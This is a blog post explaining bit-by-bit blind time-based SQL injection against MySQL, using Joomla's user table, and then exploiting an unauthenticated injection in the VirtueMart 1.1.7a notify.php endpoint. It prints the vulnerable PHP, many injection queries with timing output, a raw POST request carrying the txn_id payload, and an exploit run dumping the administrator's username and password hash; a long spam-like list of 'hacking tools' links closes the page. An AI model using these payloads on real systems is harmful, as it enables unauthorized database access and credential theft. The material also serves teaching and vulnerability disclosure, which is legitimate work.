viernes, 21 de agosto de 2020

Bit Banging Your Database

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit. 

Examples showing time difference:
 mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value: 

Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128 
01000001
10000000
-----------
00000000 

value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :


          if($order_id === "" || $order_id === null)
          {
                        $vmLogger->debug("Could not find order ID via invoice");
                        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
                       
$qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
                        $db->query($qv);
                        print($qv);
                        if( !$db->next_record()) {
                                $vmLogger->err("Error: No Records Found.");
                        }
The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#  
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.


More articles
  1. Pentest Tools Website Vulnerability
  2. Hacker Tool Kit
  3. Pentest Tools List
  4. Pentest Tools Nmap
  5. Tools For Hacker
  6. Hack Tools
  7. Hacker Tools Software
  8. Usb Pentest Tools
  9. Nsa Hack Tools
  10. Hacker Tools For Mac
  11. Pentest Tools Android
  12. Hacking Tools For Beginners
  13. Nsa Hacker Tools
  14. Hacker Tools Online
  15. Hack Tools For Games
  16. Hacking Tools
  17. Pentest Tools Tcp Port Scanner
  18. Hacker Tools Windows
  19. Bluetooth Hacking Tools Kali
  20. Pentest Tools Framework
  21. Hacker Tools For Mac
  22. What Is Hacking Tools
  23. Hacking Tools 2019
  24. Hackers Toolbox
  25. Hacker Tools
  26. How To Make Hacking Tools
  27. Best Hacking Tools 2019
  28. Hack Tool Apk No Root
  29. Hacking Apps
  30. Pentest Tools Port Scanner
  31. Pentest Tools
  32. Easy Hack Tools
  33. Pentest Tools List
  34. Github Hacking Tools
  35. Hack Apps
  36. Hacking Tools Usb
  37. Hacking Tools For Kali Linux
  38. Pentest Tools Github
  39. Pentest Tools List
  40. Game Hacking
  41. Hacking Tools Windows
  42. Hacking Tools Free Download
  43. Hacking Tools Kit
  44. Pentest Tools Nmap
  45. Hack App
  46. Hacking Tools For Kali Linux
  47. Hacker Hardware Tools
  48. Top Pentest Tools
  49. Install Pentest Tools Ubuntu
  50. Hacking Tools 2019
  51. Hacking Tools For Kali Linux
  52. Hacking Tools Name
  53. Pentest Tools Nmap
  54. Hacking Tools Free Download
  55. Install Pentest Tools Ubuntu
  56. Android Hack Tools Github
  57. Hacker Tools 2020
  58. Game Hacking
  59. Install Pentest Tools Ubuntu
  60. Game Hacking
  61. Hak5 Tools
  62. Growth Hacker Tools
  63. Hacker Tools Hardware
  64. Pentest Tools Free
  65. New Hack Tools
  66. Hacker Tools For Mac
  67. Hacking Tools For Kali Linux
  68. Game Hacking
  69. Hack Tools Pc
  70. Pentest Tools For Mac
  71. Termux Hacking Tools 2019
  72. Hack Tools 2019
  73. Pentest Tools For Windows
  74. Best Pentesting Tools 2018
  75. Best Pentesting Tools 2018
  76. Hacking Tools Github
  77. Kik Hack Tools
  78. Android Hack Tools Github
  79. Hacking Tools For Pc
  80. Tools For Hacker
  81. Top Pentest Tools
  82. What Is Hacking Tools
  83. Hacks And Tools
  84. Hack Tools For Mac
  85. Hack Tools Online
  86. Pentest Reporting Tools
  87. How To Install Pentest Tools In Ubuntu
  88. Top Pentest Tools
  89. Hacking Tools Free Download
  90. Pentest Tools
  91. Hack Tools For Windows
  92. Hack Tools Download
  93. Best Pentesting Tools 2018
  94. Hack Tools For Pc
  95. Pentest Tools Url Fuzzer
  96. Best Hacking Tools 2020
  97. Hacking Tools Kit
  98. Hacker Tools Online
  99. Hak5 Tools
  100. Hacker Tools Apk
  101. Hacking Tools Windows 10
  102. Hacking Tools Usb
  103. Pentest Tools
  104. Pentest Tools Apk
  105. Hacking Tools Usb
  106. Pentest Tools
  107. Pentest Tools Open Source
  108. Hacker Tools For Pc
  109. Pentest Tools Kali Linux
  110. Hack Tools For Games
  111. Hacking Tools Name
  112. Pentest Tools Bluekeep
  113. Underground Hacker Sites
  114. Hacking Tools Software
  115. Github Hacking Tools
  116. Hacking Tools For Games
  117. Hacker Search Tools
  118. Github Hacking Tools
  119. Hacking Tools For Windows Free Download
  120. World No 1 Hacker Software
  121. How To Install Pentest Tools In Ubuntu
  122. Hacking Tools 2020
  123. Hacking Tools Windows 10
  124. Hack Apps
  125. Pentest Tools Nmap
  126. Hacker Tools For Pc
  127. Pentest Tools Website
  128. Hack Tools
  129. Hacking Tools 2020
  130. Hack Tools For Pc
  131. Hacking Tools For Windows
  132. Pentest Tools Port Scanner
  133. Hacking Tools For Windows 7
  134. Pentest Tools Bluekeep
  135. Pentest Tools
  136. Best Hacking Tools 2019
  137. Tools For Hacker
  138. Github Hacking Tools
  139. Hack Tools For Windows
  140. Growth Hacker Tools
  141. Best Hacking Tools 2020
  142. Hack Tools For Ubuntu
  143. Underground Hacker Sites
  144. Pentest Recon Tools
  145. Pentest Tools Review
  146. Pentest Tools For Mac
  147. Hacking Tools And Software
  148. Best Hacking Tools 2020
  149. Hackrf Tools
  150. Hacking Tools Usb
  151. Termux Hacking Tools 2019
  152. Black Hat Hacker Tools
  153. Hacking Tools Download

No hay comentarios:

Publicar un comentario